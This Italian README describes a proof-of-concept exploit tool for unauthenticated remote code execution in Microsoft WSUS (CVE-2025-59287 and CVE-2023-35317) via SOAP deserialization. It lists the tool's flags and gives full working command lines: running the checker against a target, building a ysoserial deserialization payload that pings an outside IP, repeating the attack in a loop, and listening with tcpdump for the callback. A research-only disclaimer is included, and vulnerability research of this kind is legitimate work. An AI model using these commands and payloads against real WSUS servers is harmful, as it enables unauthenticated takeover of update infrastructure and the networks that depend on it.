
PoC di RCE non autenticata in Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317
Approfondimento su CVE-2025-59287: SoapFormatter RCE in WSUS: https://shellcode.blog/wsus-cve-2025-59287-investigation/
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere usato per attaccare sistemi, se non dove esplicitamente autorizzato. I manutentori del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.
Flag obbligatorie:
--target-url – URL di base del server WSUS di destinazione, es. http://WIN-246JC0TE3BB.vuln.local:8530--cve – Una tra CVE-2023-35317 o CVE-2025-59287Flag opzionali:
--dns-name – Nome DNS del client usato nelle richieste SOAP (default: bugcrowd.local)--random – Antepone a --dns-name un sottodominio casuale, così ogni esecuzione appare come un nuovo client--payload – Payload ysoserial personalizzato codificato in base64; se omesso, viene usato un payload integrato per la --cve scelta--debug – Abilita il logging di debug dettagliato (righe [DEBUG])python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --randompython3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (oppure affidati al payload integrato per --cve CVE-2023-35317)for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;donesudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done